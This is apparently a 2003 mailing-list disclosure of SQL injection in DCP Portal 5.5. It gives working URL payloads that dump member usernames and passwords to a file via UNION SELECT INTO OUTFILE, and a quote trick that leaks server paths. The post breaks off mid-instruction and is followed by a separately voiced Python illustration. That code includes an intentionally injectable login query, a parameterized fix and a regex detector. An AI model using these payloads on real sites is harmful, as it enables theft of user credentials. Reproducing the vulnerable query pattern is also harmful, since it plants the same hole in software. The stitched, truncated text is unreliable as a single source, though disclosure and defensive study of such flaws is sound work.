Lifo Fifo | 1 Oct 2003 14:08

DCP Portal - 5.5 holes


Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you
have turned off register_globals.

All the files in the product don't check the integrity of variables. You can easily exploit this using some
SQL Injection techniques. For example, if you want to get the username/password of all the users, you can
exploit advertiser.php.

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for Windows; if the web server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In these cases, you will need to enter the absolute path. For that, run the following:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the
path to the server if they have turned on display_errors in php.ini.

That's all! Notice that here we are using the UNION function in the query. For that, the host should be running
MySQL version 4.x. Well, if it's not running 4.x, no problem, we have another file!

This time it's lostpassword.php.

Open it like,


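The root cause described in the post is a login query built by pasting request parameters straight into SQL, so that a quote in the `password` value ends the string literal and the rest of the input becomes SQL syntax. The following is an added illustration, not code from DCP Portal or from the poster: it reproduces that pattern against a constructed in-memory SQLite table standing in for `dcp5_members` (sample rows and the `login_*` function names are assumptions), shows the parameterized query that closes the hole regardless of `magic_quotes_gpc`, and adds a small request-log check that flags query parameters carrying the injection markers seen in the post.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# Constructed sample data; the real dcp5_members table has more columns.
SAMPLE_MEMBERS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
]


def make_db():
    """Build an in-memory stand-in for the members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dcp5_members (uid INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO dcp5_members VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the post describes: request values spliced into the SQL text.

    A single quote in `password` terminates the literal, so a value such as
    qwe' or '1'='1 turns the WHERE clause into a tautology and every row matches.
    With display_errors on, a lone quote also leaks the script path in the error.
    """
    sql = (
        "SELECT uid, name FROM dcp5_members "
        "WHERE name = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(sql).fetchall()


def login_hardened(conn, username, password):
    """Same lookup with bound parameters.

    The driver sends the values separately from the statement text, so quotes,
    OR, UNION or INTO OUTFILE inside the input are compared as data, never
    parsed as SQL. This does not depend on magic_quotes_gpc or register_globals.
    """
    sql = "SELECT uid, name FROM dcp5_members WHERE name = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Markers from the post's own payloads: a quote followed by OR, a UNION SELECT,
# and INTO OUTFILE (file write through the database server).
INJECTION_MARKERS = re.compile(r"(?i)('\s*or\b|\bunion\s+select\b|\binto\s+outfile\b)")


def flag_request(url):
    """Return the query parameters whose percent-decoded value carries an injection marker.

    Useful when reviewing web-server access logs for attempts against advertiser.php
    and similar scripts; parse_qsl does the URL decoding for us.
    """
    query = urlsplit(url).query
    return [
        name
        for name, value in parse_qsl(query, keep_blank_values=True)
        if INJECTION_MARKERS.search(value)
    ]


if __name__ == "__main__":
    db = make_db()
    payload = "qwe' or '1'='1"
    print("vulnerable:", login_vulnerable(db, "1", payload))  # every member row
    print("hardened:  ", login_hardened(db, "1", payload))    # no match
    print("hardened, real credentials:", login_hardened(db, "alice", "s3cret"))
    # Constructed access-log URL in the shape of the one quoted in the post.
    logged = "http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe%27%20or%201%3D1"
    print("flagged parameters:", flag_request(logged))
```

The vulnerable function returns both sample members for the tautology payload while the hardened one returns nothing, which is the whole difference between the product as shipped and the fix; the escaping that `magic_quotes_gpc` provides only papers over the concatenation and is lost the moment an administrator turns that setting off, exactly the failure the post warns about.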
